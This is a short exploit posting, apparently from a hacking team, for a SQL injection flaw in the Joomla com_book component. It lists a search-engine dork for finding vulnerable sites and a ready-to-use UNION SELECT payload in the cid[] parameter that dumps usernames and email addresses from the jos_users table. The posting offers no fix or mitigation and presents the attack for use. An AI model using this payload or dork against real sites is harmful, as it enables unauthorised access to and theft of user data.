==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] ~ Note : : <3 v4sploiter
==============================================================================
[»] Joomla (com_book) SQL injection Vulnerability
==============================================================================
[»] Script: [ Joomla Comp ]
[»] Language: [ PHP ]
[»] Dork: [ inurl:"com_book" ]
[»] Founder: [ Evil-Cod3r ]
[»] Gr44tz: [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
[»] Team: [ v4-Team.com/cc ]
[»] Price: [ Free ]
###########################################################################
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
Exploit : -
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
Author: Evil-Cod3r
###########################################################################
